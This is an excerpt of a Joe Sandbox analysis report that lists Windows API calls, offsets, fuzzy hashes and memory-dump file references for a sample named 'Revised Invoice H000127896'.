                              • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                              • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                              • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                              APIs
                              • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                              • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                              • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                              • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                              • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: MessageSend$LongWindow$InvalidateRect
                              • String ID:
                              • API String ID: 1976402638-0
                              • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                              • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                              • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                              • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                              APIs
                              • ShowWindow.USER32(?,00000000), ref: 00440A8A
                              • EnableWindow.USER32(?,00000000), ref: 00440AAF
                              • ShowWindow.USER32(?,00000000), ref: 00440B18
                              • ShowWindow.USER32(?,00000004), ref: 00440B2B
                              • EnableWindow.USER32(?,00000001), ref: 00440B50
                              • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Window$Show$Enable$MessageSend
                              • String ID:
                              • API String ID: 642888154-0
                              • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                              • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                              • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                              • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Variant$Copy$ClearErrorLast
                              • String ID: NULL Pointer assignment$Not an Object type
                              • API String ID: 2487901850-572801152
                              • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                              • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                              • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                              • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                              APIs
                              • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                              • EnableWindow.USER32(?,00000000), ref: 00448B5C
                              • EnableWindow.USER32(?,00000001), ref: 00448B72
                              • ShowWindow.USER32(?,00000000), ref: 00448BE8
                              • ShowWindow.USER32(?,00000004), ref: 00448BF4
                              • EnableWindow.USER32(?,00000001), ref: 00448C09
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Window$Enable$Show$MessageSend
                              • String ID:
                              • API String ID: 1871949834-0
                              • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                              • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                              • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                              • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                              • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                              • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                              • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                              APIs
                              • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                              • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                              • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                              • SendMessageW.USER32 ref: 00471AE3
                              • DestroyIcon.USER32(?), ref: 00471AF4
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                              • String ID:
                              • API String ID: 3611059338-0
                              • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                              • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                              • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                              • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: DestroyWindow$DeleteObject$IconMove
                              • String ID:
                              • API String ID: 1640429340-0
                              • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                              • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                              • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                              • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                              APIs
                                • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                              • _wcslen.LIBCMT ref: 004438CD
                              • _wcslen.LIBCMT ref: 004438E6
                              • _wcstok.LIBCMT ref: 004438F8
                              • _wcslen.LIBCMT ref: 0044390C
                              • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                              • _wcstok.LIBCMT ref: 00443931
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                              • String ID:
                              • API String ID: 3632110297-0
                              • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                              • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                              • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                              • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Destroy$DeleteMenuObject$IconWindow
                              • String ID:
                              • API String ID: 752480666-0
                              • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                              • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                              • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                              • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Destroy$DeleteObjectWindow$IconImageList_
                              • String ID:
                              • API String ID: 3275902921-0
                              • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                              • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                              • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                              • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Destroy$DeleteObjectWindow$IconImageList_
                              • String ID:
                              • API String ID: 3275902921-0
                              • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                              • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                              • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                              • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                              APIs
                              • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                              • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                              • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: PerformanceQuery$CounterSleep$Frequency
                              • String ID:
                              • API String ID: 2833360925-0
                              • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                              • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                              • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                              • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                              APIs
                              • SendMessageW.USER32 ref: 004555C7
                              • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                              • DeleteObject.GDI32(?), ref: 00455736
                              • DeleteObject.GDI32(?), ref: 00455744
                              • DestroyIcon.USER32(?), ref: 00455752
                              • DestroyWindow.USER32(?), ref: 00455760
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: DeleteDestroyMessageObjectSend$IconWindow
                              • String ID:
                              • API String ID: 3691411573-0
                              • Opcode ID: da631fe096052ef5bd48ea011818ab2276afcb1e35ba95b92101ff2cabc01c83
                              • Instruction ID: ee39a3c17b45488341a0d6beee4a1abd3419bb98b1a9b0cd73eda499273a4889
                              • Opcode Fuzzy Hash: da631fe096052ef5bd48ea011818ab2276afcb1e35ba95b92101ff2cabc01c83
                              • Instruction Fuzzy Hash: C011B6B12047419BC710DF65EDC8A2A77A8BF18322F10066AFD50DB2D2D779D849C729
                              APIs
                                • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                              • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                              • LineTo.GDI32(?,?,?), ref: 004472AC
                              • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                              • LineTo.GDI32(?,?,?), ref: 004472C6
                              • EndPath.GDI32(?), ref: 004472D6
                              • StrokePath.GDI32(?), ref: 004472E4
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                              • String ID:
                              • API String ID: 372113273-0
                              • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                              • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                              • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                              • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                              APIs
                              • GetDC.USER32(00000000), ref: 0044CC6D
                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                              • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                              • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                              • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: CapsDevice$Release
                              • String ID:
                              • API String ID: 1035833867-0
                              • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                              • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                              • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                              • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                              APIs
                              • __getptd.LIBCMT ref: 0041708E
                                • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                              • __amsg_exit.LIBCMT ref: 004170AE
                              • __lock.LIBCMT ref: 004170BE
                              • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                              • _free.LIBCMT ref: 004170EE
                              • InterlockedIncrement.KERNEL32(02FE2D20), ref: 00417106
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
